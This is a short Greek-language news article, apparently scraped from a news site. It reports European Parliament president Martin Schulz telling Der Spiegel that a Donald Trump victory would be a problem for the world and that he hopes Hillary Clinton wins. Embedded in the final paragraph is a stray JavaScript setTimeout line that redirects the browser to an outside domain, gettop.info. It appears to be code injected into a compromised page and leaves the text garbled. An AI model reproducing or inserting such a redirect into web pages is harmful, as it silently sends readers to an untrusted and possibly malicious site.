Σουλτς: O Τραμπ πρόβλημα για όλο τον κόσμο

0
4

 

Με συνέντευξή του στο Der Spiegel ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου Μάρτιν Σουλτς εξομολογείται την επιθυμία του να κερδίσει η Χίλαρι Κλίντον και τους προβληματισμούς του σε περίπτωση που αναδειχθεί νικητής των αμερικανικών προεδιρκών εκλογών ο Ντόναλντ Τραμπ.

Εάν ο Τραμπ κερδίσει τις εκλογές τον Νοέμβριο, αυτό θα αποτελέσει πρόβλημα για ολόκληρο τον κόσμο και θα ενθαρρύνει τους μιμητές του στην Ευρώπη, επεσήμανε ο Μάρτιν Σουλτς που συμπλήρωσε: «Ο Τραμπ δεν αποτελεί μόνο πρόβλημα για την ΕΕ αλλά και για υπόλοιπο κόσμο».

«Εάν ένας άνθρωπος που κάνει επίδειξη με το να μην έχει την παραμικρή ιδέα και να υποστηρίζει ότι η εξειδικευμένη γνώση είναι ελιτίστικες ανοησίες, καταλήξει στο Λευκό Οίκο, τότε θα έχουμε φθάσει σε ένα κρίσιμο σημείο», υπογράμμισε ο πρόεδρος του Ευρωκοινοβουλίου.

Ένα τέτοιο σενάριο θα σημαίνει ότι υπάρχει «ένας προφανώς ανεύθυνος άνθρωπος» σε μια θέση που απαιτεί την υπέρτατη αίσθηση ευθύνης, δήλωσε ο Σουλτς. Πρόσθεσε ότι ανησυχεί πως μια ενδεχόμενη νίκη του Τραμπ θα δημιουργήσει μιμητές στην Ευρώπη. «Γι’ αυτό θέλω να κερδίσει η Χίλαρι Κλίντον», πρόσθεσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here